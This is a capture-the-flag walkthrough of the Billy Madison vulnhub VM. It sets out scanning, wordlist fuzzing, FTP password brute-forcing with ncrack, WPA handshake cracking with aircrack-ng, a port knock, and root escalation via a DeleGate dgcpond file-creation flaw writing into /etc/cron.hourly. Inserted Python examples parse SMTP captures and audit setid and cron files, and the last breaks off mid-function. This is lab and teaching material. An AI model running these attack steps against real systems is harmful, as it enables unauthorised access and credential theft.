Billy Madison vulnhub VM walkthrough

I was browsing Twitter one afternoon and saw that @7minsec was looking for testers for his next boot2root challenge, based on the movie Billy Madison. Since I thoroughly enjoyed his first CTF (Tommy Boy) I jumped at the opportunity.

Recon

As always, we start off with a super stealthy nmap scan.

Nmap scan report for 192.168.110.181
Host is up (0.00020s latency).
Not shown: 65526 filtered ports

PORT     STATE  SERVICE     VERSION
22/tcp   open   tcpwrapped
23/tcp   open   telnet?
69/tcp   open   http        BaseHTTPServer
80/tcp   open   http        Apache httpd 2.4.18 
139/tcp  open   netbios-ssn Samba smbd 3.X 
445/tcp  open   netbios-ssn Samba smbd 3.X 
2525/tcp open   smtp

Grabbing the source of the index page on port 80 we can see that Billy’s PC has been taken over and we must unlock it and recover his final paper before time is up! I also took a look at the eric.php page, which I later found out is a troll meant to block directory bruteforcing with tools such as dirbuster.

root@mrb3n:~# curl -s http://192.168.110.181
<TITLE>Oh nooooooo!</TITLE>
<html>
<p>
<center><h1> UH OH!</h1></center>
<p>
<center><img src="eric-tongue-animated.gif"></center>
<p>
<center><h1>Silly Billy!!!</h1></center>
<p>
<center><h3>If you're reading this, you clicked on the link I sent you.  OH NOES!  Your computer's all locked up, and now you can't get access to your final 12th grade assignment you've been working so hard on!  You need that to graduate, Billy Boy!!</h3></center>
<p>
<center><h3>Now all I have to do is sit and wait for a while and...</h3></center>
<p>
<center><img src="hotels.gif"></center>
<p> 
<center><h2>I bet this is you right now:</h2></center>
<p>
<center><img src="billy-mad.png"><img src="billy-mad.png"><img src="billy-mad.png"></center>
<P>
<p><center><h2>Think you can get your computer unlocked and recover your final paper before time runs out and you FAAAAIIIILLLLL?????</h2></center>
<p>
<center>Good luck, schmuck.</center>
<p>
</html>

I pulled down all of the images for offline analysis as they often contain valuable information during CTFs but I did not uncover anything useful.

root@mrb3n:~/Desktop/billymadison# curl -O http://192.168.110.181/billy-mad.png
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  225k  100  225k    0     0  18.5M      0 --:--:-- --:--:-- --:--:-- 19.9M

root@mrb3n:~/Desktop/billymadison# curl -O http://192.168.110.181/hotels.gif
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  329k  100  329k    0     0  53.6M      0 --:--:-- --:--:-- --:--:-- 64.4M

root@mrb3n:~/Desktop/billymadison# curl -O http://192.168.110.181/eric-tongue-animated.gif
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  440k  100  440k    0     0  26.1M      0 --:--:-- --:--:-- --:--:-- 26.8M



Having exhausted my options on the web app for the time being I checked out what was going on with the telnet port. I was greeted with a friendly ban notice (confirmed on a re-connection attempt) as well as my first hint at a password (possibly ROT).

root@mrb3n:~/Desktop/billymadison# telnet 192.168.110.181
Trying 192.168.110.181...
Connected to 192.168.110.181.
Escape character is '^]'.
****** HAHAH! You're banned for a while, Billy Boy!  By the way, I caught you trying to hack my wifi - but the joke's on you! I don't use ROTten passwords like rkfpuzrahngvat anymore! Madison Hotels is as good as MINE!!!! *****
Connection closed by foreign host.

Port 69 was hosting a WordPress site. I enumerated a bit with WPScan and ultimately hit a wall. Once on the box I confirmed that this was an intentional honeypot by the author.

root@mrb3n:~# wpscan --url http://192.168.110.181:69 --enumerate u
WordPress Security Scanner by the WPScan Team 
                       Version 2.8
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o [A]bort, default: [N]n
The plugins directory 'wp-content/plugins' does not exist.
You can specify one per command line option (don't forget to include the wp-content directory if needed)
[?] Continue? [Y]es [N]o, default: [N]
y
[+] URL: http://192.168.110.181:69/
[+] Started: Thu Aug 25 11:33:21 2016

[!] The WordPress 'http://192.168.110.181:69/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: MadisonHotelsWordpress
[+] XML-RPC Interface available under: http://192.168.110.181:69/xmlrpc.php

[+] WordPress version 1.0 identified from meta generator

[+] WordPress theme in use: twentyeleven

[+] Name: twentyeleven
 |  Location: http://192.168.110.181:69/wp-content/themes/twentyeleven/
 |  Readme: http://192.168.110.181:69/wp-content/themes/twentyeleven/readme.txt
 |  Changelog: http://192.168.110.181:69/wp-content/themes/twentyeleven/changelog.txt
 |  Style URL: http://192.168.110.181:69/wp-content/themes/twentyeleven/style.css
 |  Referenced style.css: http://192.168.110.181:69/static/wp-content/themes/twentyeleven/style.css
 |  Description: 

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating usernames ...
[!] Stop User Enumeration plugin detected, results might be empty. However a bypass exists for v1.2.8 and below, see stop_user_enumeration_bypass.rb in /usr/share/wpscan
[+] We did not enumerate any usernames

[+] Finished: Thu Aug 25 11:33:22 2016
[+] Requests Done: 62
[+] Memory used: 7.863 MB
[+] Elapsed time: 00:00:00

Next I fired up enum4linux to see what I could uncover via SMB. The scan returned an open share (with anonymous access) as well as three local users.

root@mrb3n:~/Desktop/billymadison# enum4linux -a 192.168.110.181
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Aug 25 11:23:27 2016

 ============================================ 
|    Share Enumeration on 192.168.110.181    |
 ============================================ 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

	Sharename       Type      Comment
	---------       ----      -------
	EricsSecretStuff Disk      
	IPC$            IPC       IPC Service (BM)

	Server               Comment
	---------            -------
	BM                   BM

	Workgroup            Master
	---------            -------
	WORKGROUP            BM

[+] Attempting to map shares on 192.168.110.181
//192.168.110.181/EricsSecretStuff	Mapping: OK, Listing: OK
//192.168.110.181/IPC$	Mapping: OK	Listing: DENIED


========================================================================== 
|    Users on 192.168.110.181 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-4111762292-2429122530-3796655328
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ' '

S-1-22-1-1000 Unix User\billy (Local User)
S-1-22-1-1001 Unix User\veronica (Local User)
S-1-22-1-1002 Unix User\eric (Local User)

Connecting to the Samba share I pulled down the files listed. The ebd.txt file stated that the backdoor was closed, more on that later.

root@mrb3n:~# smbclient //192.168.110.181/EricsSecretStuff -u anonymous
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
  .                                   D        0  Thu Aug 25 10:16:19 2016
  ..                                  D        0  Sat Aug 20 14:56:45 2016
  ._.DS_Store                        AH     4096  Wed Aug 17 10:32:07 2016
  ebd.txt                             N       35  Thu Aug 25 10:16:19 2016
  .DS_Store                          AH     6148  Wed Aug 17 10:32:12 2016

59164 blocks of size 524288. 50914 blocks available

smb: \> get ebd.txt 
getting file \ebd.txt of size 35 as ebd.txt (5.7 KiloBytes/sec) (average 5.7 KiloBytes/sec)
smb: \> get ._.DS_Store 
getting file \._.DS_Store of size 4096 as ._.DS_Store (1000.0 KiloBytes/sec) (average 403.4 KiloBytes/sec)
smb: \> get .DS_Store 
getting file \.DS_Store of size 6148 as .DS_Store (1200.8 KiloBytes/sec) (average 669.2 KiloBytes/sec)

root@mrb3n:~/Desktop/billymadison# cat ebd.txt 

Erics backdoor is currently CLOSED

The string ‘rkfpuzrahngvat’ from the telnet banner looked like some sort of encrypted or ciphered text. Given the banner’s hint about “ROTten” passwords, it proved to be ROT13, decoding to ‘exschmenuating’. I tried this in various combinations of username and password without success. Eventually I took a long shot and tried it as a page name and got a hit! Eric’s admin console!

root@mrb3n:~/Desktop/billymadison# curl -s http://192.168.110.181/exschmenuating/

<TITLE>Eric's Admin Console 1.0</TITLE>
<html>
<h1>"Ruin Billy Madison's Life" - Eric's notes</h1>
<p>
<center><h1>08/01/16</h1></center>
Looks like Principal Max is too much of a goodie two-shoes to help me ruin Billy Boy's life.  Will ponder other victims.

<center><h1>08/02/16</h1></center>
Ah!  Genius thought!  Billy's girlfriend Veronica uses his machine too.  I might have to cook up a phish and see if I can't get her to take the bait.

<center><h2>08/03/16</h2></center>
OMg LOL LOL LOL!!!  What a twit - I can't believe she fell for it!!  I .captured the whole thing in this folder for later lulz.  I put "veronica" somewhere in the file name because I bet you a million dollars she uses her name as part of her passwords - if that's true, she rocks!

Anyway, malware installation successful.  I'm now in complete control of Bill's machine!

<center>
<center><h1>Log monitor</h1></center>
<p>
<center>This will help me keep an eye on Billy's attempt to free his machine from my wrath.</center>
<p>
<center><a href="currently-banned-hosts.txt">View log</a>
<p>
</html>

Checking out the ‘currently-banned-hosts.txt’ file confirms that I have been banned multiple times while trying to connect via telnet. The file also offers a hint to reset the VM to remove the ban.

root@mrb3n:~/Desktop/billymadison# curl -s http://192.168.110.181/exschmenuating/currently-banned-hosts.txt
---
2016-08-25-13-59-01
Hosts currently banned
---
If your IP appears in this list it has been banned, and you will need to reset this host to lift the ban. Otherwise, further efforts to connect to this host may produce false positives or refuse connections altogether.
---
Chain INPUT (policy DROP)
DROP       all  --  192.168.110.179      anywhere            
---
If your IP appears in this list it has been banned, and you will need to reset this host to lift the ban. Otherwise, further efforts to connect to this host may produce false positives or refuse connections altogether.

I reset the VM and checked the ban list again.

root@mrb3n:~/Desktop/billymadison# curl -s http://192.168.110.181/exschmenuating/currently-banned-hosts.txt
---
2016-08-25-14-08-01
Hosts currently banned
Chain INPUT (policy DROP)
---
If your IP appears in this list it has been banned, and you will need to reset this host to lift the ban. Otherwise, further efforts to connect to this host may produce false positives or refuse connections altogether.
---

From the clue on the page above it seemed I might be looking for a packet capture file with ‘veronica’ somewhere in the file name. I tried many names by hand and eventually found the file by fuzzing with wfuzz and a custom wordlist made of the rockyou.txt entries containing ‘veronica’.

root@mrb3n:~/Desktop/billymadison# cat /root/rockyou.txt | grep veronica > veronica.txt
root@mrb3n:~/Desktop/billymadison# wfuzz  -c -z file,/root/Desktop/billymadison/veronica.txt --hc 404 http://192.168.110.181/exschmenuating/FUZZ.cap 
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.110.181/exschmenuating/FUZZ.cap
Total requests: 773

==================================================================
ID	Response   Lines      Word         Chars          Request    
==================================================================

00521:  C=400     10 L	      35 W	    307 Ch	  "veronica$%"
00716:  C=200    192 L	     722 W	   8700 Ch	  "012987veronica"
00723:  C=200     24 L	     135 W	    940 Ch	  "#0104veronica"

Total time: 0.705309
Processed Requests: 773
Filtered Requests: 770
Requests/sec.: 1095.972

We can analyze packet capture files with the tshark command-line utility. A quick bash script splits the capture into one file per TCP stream and also dumps each stream’s payload to a .txt file, so the SMTP sessions can be read without opening Wireshark.

#!/bin/bash
# Split the capture into one .cap per TCP stream and dump each stream's
# conversation as ASCII (tshark's "follow" statistic) into stream-N.txt.
cap=012987veronica.cap
for stream in $(tshark -r "$cap" -Y tcp -T fields -e tcp.stream | sort -n | uniq)
do
    echo "stream $stream"
    tshark -r "$cap" -w "stream-$stream.cap" -Y "tcp.stream==$stream"
    tshark -r "$cap" -q -z "follow,tcp,ascii,$stream" > "stream-$stream.txt"
done

The packet capture contained 6 separate email messages.
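Reading six sessions by hand is fine, but the stream index is capture order, not sending order (compare the Date headers of messages 4 and 5 below). The following is an added example of my own, not from the original post: it pulls every DATA block out of per-stream ASCII dumps (assumed to be named stream-N.txt, as produced by tshark -z follow,tcp,ascii,N), parses each with the stdlib email module and orders them by Date. The two sample transcripts are constructed from the headers on this page with shortened bodies.

```python
"""Recover the e-mails from SMTP session dumps and order them by Date.

Added example, not part of the walkthrough. It expects one text dump per
TCP stream (e.g. `tshark -r cap -q -z follow,tcp,ascii,N > stream-N.txt`),
finds every DATA block, parses the message with the stdlib email module and
sorts the results by the Date header.
"""
import re
from datetime import datetime, timezone
from email import message_from_string
from email.utils import parsedate_to_datetime
from pathlib import Path

# Server side of the dialogue: "220 BM ESMTP", "250 Ok", "354 End data ...".
# tshark indents one direction with a tab, hence the leading \s*.
_REPLY = re.compile(r"^\s*\d{3}[ -]")
_EPOCH = datetime.min.replace(tzinfo=timezone.utc)  # sort key for a missing Date


def extract_messages(transcript):
    """Return the messages submitted in one SMTP session transcript.

    Server replies are dropped (a body line that itself starts with a
    three-digit code would be lost too; real mail rarely does that).
    """
    messages, buf, in_data = [], [], False
    for raw in transcript.splitlines():
        line = raw.rstrip("\r")
        if _REPLY.match(line):
            continue
        if not in_data:
            if line.strip().upper() == "DATA":
                in_data, buf = True, []
            continue
        if line.strip() == ".":  # end-of-data marker: hand the buffer to the parser
            msg = message_from_string("\n".join(buf))
            date = msg["Date"]
            messages.append({
                "date": parsedate_to_datetime(date) if date else None,
                "from": msg["From"],
                "to": msg["To"],
                "subject": msg["Subject"],
                "body": msg.get_payload().strip(),
            })
            in_data = False
        else:
            # SMTP dot-stuffing: a body line starting with "." is sent as ".."
            buf.append(line[1:] if line.startswith("..") else line)
    return messages


def timeline(streams):
    """Merge the messages of many stream dumps and sort them by Date."""
    found = []
    for name, text in streams.items():
        for msg in extract_messages(text):
            found.append(dict(msg, stream=name))
    return sorted(found, key=lambda m: m["date"] or _EPOCH)


def load_streams(directory="."):
    """Read stream-*.txt dumps from disk into {filename: text}."""
    return {p.name: p.read_text(errors="replace")
            for p in sorted(Path(directory).glob("stream-*.txt"))}


# Constructed sample: two sessions built from the headers of messages 4 and
# 5 on this page, with shortened bodies. Stream numbering reflects capture
# order, which is not the sending order.
SAMPLE_STREAMS = {
    "stream-3.txt": (
        "220 BM ESMTP SubEthaSMTP null\n"
        "MAIL FROM: eric@madisonhotels.com\n250 Ok\n"
        "RCPT TO: vvaughn@polyfector.edu\n250 Ok\n"
        "DATA\n354 End data with <CR><LF>.<CR><LF>\n"
        "Date: Sat, 20 Aug 2016 21:57:31 -0500\n"
        "To: vvaughn@polyfector.edu\nFrom: eric@madisonhotels.com\n"
        "Subject: RE[4]: VIRUS ALERT!\n\n"
        "Great, the file is uploaded to the FTP server.\n"
        ".\n250 Ok\nQUIT\n221 Bye\n"
    ),
    "stream-4.txt": (
        "220 BM ESMTP SubEthaSMTP null\n"
        "MAIL FROM: vvaughn@polyfector.edu\n250 Ok\n"
        "RCPT TO: eric@madisonhotels.com\n250 Ok\n"
        "DATA\n354 End data with <CR><LF>.<CR><LF>\n"
        "Date: Sat, 20 Aug 2016 21:57:21 -0500\n"
        "To: eric@madisonhotels.com\nFrom: vvaughn@polyfector.edu\n"
        "Subject: RE[3]: VIRUS ALERT!\n\n"
        "Done.\n"
        ".\n250 Ok\nQUIT\n221 Bye\n"
    ),
}

if __name__ == "__main__":
    # Swap SAMPLE_STREAMS for load_streams(".") to run against real dumps.
    for m in timeline(SAMPLE_STREAMS):
        print(m["date"].isoformat(), m["stream"], m["from"], "->", m["to"], m["subject"])
```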

Message 1

Date: Sat, 20 Aug 2016 21:56:50 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: VIRUS ALERT!
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/

Hey Veronica, 

Eric Gordon here.  

I know you use Billy's machine more than he does, so I wanted to let you know that the company is rolling out a new antivirus program for all work-from-home users.  Just <a href="http://areallyreallybad.malware.edu.org.ru/f3fs0azjf.php">click here</a> to install it, k?  

Thanks. -Eric

Message 2

Date: Sat, 20 Aug 2016 21:57:00 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:00 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE: VIRUS ALERT!

Eric,

Thanks for your message. I tried to download that file but my antivirus blocked it.

Could you just upload it directly to us via FTP?  We keep FTP turned off unless someone connects with the "Spanish Armada" combo.



-VV

Message 3

Date: Sat, 20 Aug 2016 21:57:11 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: test Sat, 20 Aug 2016 21:57:11 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[2]: VIRUS ALERT!

Veronica,

Thanks that will be perfect.  Please set me up an account with username of "eric" and password "ericdoesntdrinkhisownpee."

-Eric

Message 4

Date: Sat, 20 Aug 2016 21:57:31 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: test Sat, 20 Aug 2016 21:57:31 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[4]: VIRUS ALERT!

Veronica,

Great, the file is uploaded to the FTP server, please go to a terminal and run the file with your account - the install will be automatic and you won't get any pop-ups or anything like that.  Thanks!

-Eric

Message 5

Date: Sat, 20 Aug 2016 21:57:21 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:21 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[3]: VIRUS ALERT!

Eric,

Done.

-V

Message 6

Date: Sat, 20 Aug 2016 21:57:41 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:41 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[5]: VIRUS ALERT!

Eric,

I clicked the link and now this computer is acting really weird.  The antivirus program is popping up alerts, my mouse started to move on its own, my background changed color and other weird stuff.  I'm going to send this email to you and then shut the computer down.  I have some important files I'm worried about, and Billy's working on his big 12th grade final.  I don't want anything to happen to that!

-V

There is a lot of information here, but the most important is in messages 2 and 3. The “Spanish Armada” combo in message 2 alludes to port knocking. In the YouTube clip provided, Billy guesses the year of the Spanish Armada with the following sequence: 1466, 1467, 1469, 1514, 1981, 1986. Listening carefully, however, he actually says “67”, not 1467. We can use nmap to perform the port knock with that sequence.

for x in 1466 67 1469 1514 1981 1986; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 192.168.110.181; done

Once the knock completed I checked and, sure enough, port 21 was now open. Logging in with the credentials from message 3 gave us our next clue.

The FTP directory contained a notes file as well as various Exploit-DB exploits for Ubuntu 16.04, which were likely trolls, but I saved them for later just in case.

root@mrb3n:~/Desktop/billymadison# ftp 192.168.72.155
Connected to 192.168.72.155.
220 Welcome to ColoradoFTP - the open source FTP server (www.coldcore.com)
Name (192.168.72.155:root): eric
331 User name okay, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
ftp> ls
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp 6326 Aug 20 12:49 40049
-rwxrwxrwx 1 ftp 9132 Aug 20 12:49 40054
-rwxrwxrwx 1 ftp 1287 Aug 20 12:49 9129
-rwxrwxrwx 1 ftp 740 Aug 22 21:18 .notes
-rwxrwxrwx 1 ftp 5367 Aug 20 12:49 39772
-rwxrwxrwx 1 ftp 5208 Aug 20 12:49 39773

The .notes file refers to the privilege escalation exploits (one of them being installed backwards, more on that later), hints at how to open Eric’s backdoor, and mentions Billy’s and Veronica’s accounts in connection with his wifi password.

root@mrb3n:~/Desktop/billymadison# cat .notes 
Ugh, this is frustrating.  

I managed to make a system account for myself. I also managed to hide Billy's paper
where he'll never find it.  However, now I can't find it either :-(. 
To make matters worse, my privesc exploits aren't working.  
One sort of worked, but I think I have it installed all backwards.

If I'm going to maintain total control of Billy's miserable life (or what's left of it) 
I need to root the box and find that paper!

Fortunately, my SSH backdoor into the system IS working.  
All I need to do is send an email that includes
the text: "My kid will be a ________ _________"

Hint: https://www.youtube.com/watch?v=6u7RsW5SAgs

The new secret port will be open and then I can login from there with my wifi password, which I'm
sure Billy or Veronica know.  I didn't see it in Billy's FTP folders, but didn't have time to
check Veronica's.

-EG

From some earlier testing I knew that I could send emails over port 2525 via telnet and the email file would be accessible in the EricsSecretStuff Samba directory. I crafted an email with the phrase “My kid will be a soccer player” in the body, waited a bit and checked. Sure enough the ebd file now stated that the backdoor was open.

root@mrb3n:~/Desktop/billymadison# telnet 192.168.72.155 2525
Trying 192.168.72.155...
Connected to 192.168.72.155.
Escape character is '^]'.
220 BM ESMTP SubEthaSMTP null
MAIL FROM: vvaugh@polyfector.edu
250 Ok
RCPT TO: eric@madisonhotels.com
250 Ok
DATA
354 End data with <CR><LF>.<CR><LF>

SUBJECT: email

My kid will be a soccer player

.
250 Ok

Email received

root@mrb3n:~# smbclient //192.168.72.155/EricsSecretStuff
Enter root's password: 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
  .                                   D        0  Fri Aug 26 10:57:38 2016
  ..                                  D        0  Sat Aug 20 14:56:45 2016
  260816095738178.eml                 N       95  Fri Aug 26 10:57:38 2016
  ._.DS_Store                        AH     4096  Wed Aug 17 10:32:07 2016
  ebd.txt                             N       53  Fri Aug 26 11:00:01 2016
  .DS_Store                          AH     6148  Wed Aug 17 10:32:12 2016

		59164 blocks of size 524288. 50881 blocks available
smb: \> get 260816095738178.eml 
getting file \260816095738178.eml of size 95 as 260816095738178.eml (30.9 KiloBytes/sec) (average 30.9 KiloBytes/sec)
smb: \> ^Z
[1]+  Stopped                 smbclient //192.168.72.155/EricsSecretStuff
root@mrb3n:~# cat 260816095738178.eml 
        Fri, 26 Aug 2016 09:57:14 -0500 (CDT)

SUBJECT: email

My kid will be a soccer player

Backdoor now open.

root@mrb3n:~# cat ebd.txt 
2016-08-26-10-03-01
Erics backdoor is currently OPEN

Another nmap scan shows us a newly opened port 1974.

PORT     STATE  SERVICE
22/tcp   open   ssh
23/tcp   open   telnet
69/tcp   open   tftp
80/tcp   open   http
137/tcp  closed netbios-ns
138/tcp  closed netbios-dgm
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
1974/tcp open   drp
2525/tcp open   ms-v-worlds

Scanning port 1974 revealed that the backdoor was an SSH service.

root@mrb3n:~# nmap -sV -p 1974 192.168.72.155

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-08-26 11:43 EDT
Nmap scan report for 192.168.72.155
Host is up (0.00062s latency).
PORT     STATE SERVICE VERSION
1974/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
MAC Address: 00:0C:29:44:13:0E (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We now have an SSH service and a username (eric) but no password. Reading back through the hints, there must be an account for billy or veronica on one of the previously opened services. Since we already had a wordlist for Veronica, I gave it a go with ncrack against the FTP service.

root@mrb3n:~/Desktop/billymadison# ncrack -u veronica -P veronica.txt -T 5 192.168.72.155 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2016-08-26 11:59 EDT

Discovered credentials for ftp on 192.168.72.155 21/tcp:
192.168.72.155 21/tcp ftp: 'veronica' 'babygirl_veronica07@yahoo.com'

Ncrack done: 1 service scanned in 188.98 seconds.

Logging into the FTP server as Veronica we find another email and another packet capture file. Note: make sure to switch to binary mode once logged in, or the packet capture file will not download properly.

root@mrb3n:~/Desktop/billymadison# ftp 192.168.72.155
Connected to 192.168.72.155.
220 Welcome to ColoradoFTP - the open source FTP server (www.coldcore.com)
Name (192.168.72.155:root): veronica
331 User name okay, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
ftp> ls
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp 595 Aug 20 12:55 email-from-billy.eml
-rwxrwxrwx 1 ftp 719128 Aug 17 12:16 eg-01.cap

The email talks about cracking Eric’s wireless password and sure enough the packet capture file is encrypted 802.11 wireless traffic.

root@mrb3n:~/Desktop/billymadison# cat email-from-billy.eml 
        Sat, 20 Aug 2016 12:55:45 -0500 (CDT)
Date: Sat, 20 Aug 2016 12:55:40 -0500
To: vvaughn@polyfector.edu
From: billy@madisonhotels.com
Subject: test Sat, 20 Aug 2016 12:55:40 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
Eric's wifi

Hey VV,

It's your boy Billy here.  Sorry to leave in the middle of the night but I wanted to crack Eric's wireless and then mess with him.
I wasn't completely successful yet, but at least I got a start.

I didn't walk away without doing my signature move, though.  I left a flaming bag of dog poo on his doorstep. 🙂

Kisses,

Billy

Armed with our packet capture file and the trusty rockyou.txt wordlist, I set to work attempting to crack Eric’s wireless password using aircrack-ng. Some 30 minutes later I had a hit.

root@mrb3n:~/Desktop/billymadison# aircrack-ng eg-01.cap -w /root/rockyou.txt 
Opening eg-01.cap
Read 13003 packets.

   #  BSSID              ESSID                     Encryption

   1  02:13:37:A5:52:2E  EricGordon                WPA (1 handshake)

Choosing first network as target.

Opening eg-01.cap
Reading packets, please wait...

                                 Aircrack-ng 1.2 rc3


                   [00:32:35] 1699628 keys tested (897.71 k/s))


                           KEY FOUND! [ triscuit* ]


      Master Key     : 9E 8B 4F E6 CC 5E E2 4C 46 84 D2 AF 59 4B 21 6D 
                       B5 3B 52 84 04 9D D8 D8 83 67 AF 43 DC 60 CE 92 

      Transient Key  : 7A FA 82 59 5A 9A 23 6E 8C FB 1D 4B 4D 47 BE 13 
                       D7 AC AC 4C 81 0F B5 A2 EE 2D 9F CC 8F 05 D2 82 
                       BF F4 4E AE 4E C9 ED EA 31 37 1E E7 29 10 13 92 
                       BB 87 8A AE 70 95 F8 62 20 B5 2B 53 8D 0C 5C DC 

      EAPOL HMAC     : 86 63 53 4B 77 52 82 0C 73 4A FA CA 19 79 05 33

Finally, after all this time I had a shell. Logging in with eric’s credentials I was on to the next step.

root@mrb3n:~/Desktop/billymadison# ssh eric@192.168.72.155 -p 1974
eric@192.168.72.155's password: 
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-34-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

12 packages can be updated.
0 updates are security updates.


Last login: Sat Aug 20 22:28:28 2016 from 192.168.3.101
eric@BM:~$ 


eric@BM:~$ cat why-1974.txt 
Why 1974?  Because: http://www.metacafe.com/watch/an-VB9KuJtnh4bn/billy_madison_1995_billy_hangs_out_with_friends/

Beware of trolls!

The author took care to plant many trolls throughout the file system as well as some programs and files to give the appearance of an actual workstation.

eric@BM:/opt/coloradoftp-prime/home/anonymous$ cat Billys-12th-grade-final-project.doc 
HHAHAAHAHAH I CAN'T BELIEVE YOU ACTUALLY THOUGHT THIS WAS IT!!!!  WHAT A LOSER! Why don't you go pass
out by the pool for another hour!

-EG

I guess billy works as a pentester?

eric@BM:/opt# ls
bpatty             fakesmtp    reconng  Sn1per   wp
coloradoftp-prime  honeyports  rg       testssl

Privilege escalation

I spent a great deal of time enumerating the file system. I could see that billy had sudo privileges, and that there was a directory named ‘/PRIVATE’ owned by root. At this point I knew that I had to become root to move forward. None of the privilege escalation exploits alluded to in the FTP directory worked, nor was I able to guess billy’s password.

I performed all the normal checks for world-writable files and SUID/SGID binaries, and one stood out.

root@BM:/opt/bpatty# find / -perm -2000 -type f 2>/dev/null
/usr/local/share/sgml/donpcgd
/usr/bin/chage
/usr/bin/wall
/usr/bin/screen
/usr/bin/mlocate
/usr/bin/crontab
/usr/bin/expiry
/usr/bin/bsd-write
/usr/bin/at
/usr/bin/ssh-agent
/usr/lib/x86_64-linux-gnu/utempter/utempter
/sbin/pam_extrausers_chkpwd
/sbin/unix_chkpwd

The binary in /usr/local/share/sgml appeared out of place. I pulled it down, opened it in IDA and confirmed that it was not a custom binary made for this challenge. Recall the hint in the .notes file about one of the exploits being installed backwards: reversing the name of this binary gives “dgcpond”, which points to a known local privilege escalation in DeleGate v9.9.13 (https://www.exploit-db.com/exploits/39134). The DeleGate installer sets some of its helper binaries SUID root (here the binary is SGID instead). Per the exploit write-up, the “dgcpond” binary creates a node on behalf of a local, unprivileged user anywhere on the disk, meaning we can create a file in ANY directory, even those owned by root. Creating a shell script in /etc/cron.hourly should let us escalate privileges, since every executable script in that directory is run as root at 17 minutes past each hour.
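From the defender’s side, the two conditions this escalation relies on (a set-gid binary that no package shipped, and a cron drop-in that a non-root user was able to create) are both easy to audit. The following is an added example of mine, not from the walkthrough: it walks a filesystem, flags set-uid/set-gid files outside a baseline, and flags cron.* entries that are not root-owned or are group/world-writable. The baseline is constructed from the find output above (it would normally be generated from the distro’s package manifests), and uid 1002 for eric comes from the enum4linux output.

```python
"""Audit for the two conditions the escalation above relied on.

Added example, not from the walkthrough. It flags set-uid/set-gid files
outside a baseline and cron drop-in files that are not root-owned or are
group/world-writable. The baseline is constructed from this page's find
output and would normally come from the distro's package manifests.
"""
import os
import stat
from dataclasses import dataclass

# Constructed baseline: the set-gid paths a stock Ubuntu 16.04 ships, as
# listed by the find command on this page.
KNOWN_SETID = {
    "/usr/bin/chage", "/usr/bin/wall", "/usr/bin/screen", "/usr/bin/mlocate",
    "/usr/bin/crontab", "/usr/bin/expiry", "/usr/bin/bsd-write", "/usr/bin/at",
    "/usr/bin/ssh-agent", "/usr/lib/x86_64-linux-gnu/utempter/utempter",
    "/sbin/pam_extrausers_chkpwd", "/sbin/unix_chkpwd",
}
# run-parts executes everything in these directories as root without
# checking who owns the file, so ownership is the signal to watch.
CRON_DIRS = ("/etc/cron.hourly", "/etc/cron.daily", "/etc/cron.weekly",
             "/etc/cron.monthly", "/etc/cron.d")


@dataclass(frozen=True)
class Entry:
    path: str
    mode: int   # st_mode as returned by os.lstat
    uid: int


def setid_findings(entries, baseline=KNOWN_SETID):
    """Return (path, kind) for set-uid/set-gid regular files not in the baseline."""
    out = []
    for e in entries:
        if not stat.S_ISREG(e.mode):
            continue
        if e.mode & (stat.S_ISUID | stat.S_ISGID) and e.path not in baseline:
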